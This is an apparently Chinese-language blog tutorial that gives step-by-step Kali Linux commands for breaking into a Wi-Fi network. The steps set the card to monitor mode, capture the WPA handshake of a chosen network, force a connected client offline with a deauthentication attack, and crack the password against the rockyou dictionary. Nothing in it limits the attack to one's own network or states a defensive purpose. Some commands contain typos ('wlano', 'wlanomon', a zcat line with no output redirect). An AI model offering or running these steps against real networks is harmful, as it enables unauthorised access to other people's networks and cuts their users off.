使用kali破解wifi密码

本次教程是在kali linux系统下,使用kali自带的airmon-ng 、 airodump-ng 、 aircrack-ng 命令破解Wi-Fi(可能还需aireplay-ng),先拿到握手包,再用握手包跑密码字典,得到最终wifi密码。

开始前准备:

  1. kali系统

  2. kali支持的无线网卡:推荐RT3070 和 RT8187

  3. 密码字典(kali系统已自带一个密码字典)

 

详细步骤:

一、插入网卡并开启监听模式:

开启监听模式命令:

airmon-ng start wlano

 输入 iwconfig 命令后,wlan0变为wlan0mon即开启了监听模式。

 

二、扫描网络,找到要破解的Wi-Fi的MAC地址、信道等信息:

airodump-ng wlan0mon

这里如果一直扫描不到网络,可能有以下几点情况:

  1. 输入如下命令重启monitor

ifconfig wlan0mon down

iwconfig wlan0mon mode monitor

ifconfig wlan0mon up

airodump-ng wlan0mon

  2. 开启监听时有报错,针对报错百度或者谷歌寻找答案解决。

  3. 无线网卡是坏的

 

 三、针对要破解的WI-FI开启监听,并获取到握手包:

airodump-ng -c [信道CH值] --bssid [MAC地址BSSID值] -w [存储握手包路径/握手包等文件名称] wlan0mon

 

四、当有新用户连接此Wi-Fi时,就能获取握手包,页面会出现handshake信息,如下:

 

 如果迟迟不能获取到握手包,可以对Wi-Fi进行攻击,让一个用户下线,其重新上线后即可获取到握手包,

aireplay-ng -0 [攻击次数] -a [wifi MAC地址] -c [客户端MAC地址] wlanomon

 

五、用握手包跑密码字典,得到Wi-Fi密码:

aircrack-ng -w [密码字典路径] [握手包路径]

 这里用的是kali自带的密码字典,新装的kali系统密码字典可能是一个压缩包gz文件,需要将其解压为rockyou.txt文件

zcat [rockyou.txt.gz文件路径] [输出密码字典文件路径]

 等待破解完成即可,密码越简单破解越快,理论只要字典内容够多,Wi-Fi密码都能破解,破解完成会出现 KEY FOUND! 字样,其后面中括号里面的就是Wi-Fi密码


  • 作者:合十
  • 发表时间:2022年1月16日 20:50
  • 更新时间:2024年3月29日 08:09
  • 所属分类:Linux相关

Comments

该文章还未收到评论,点击下方评论框开始评论吧~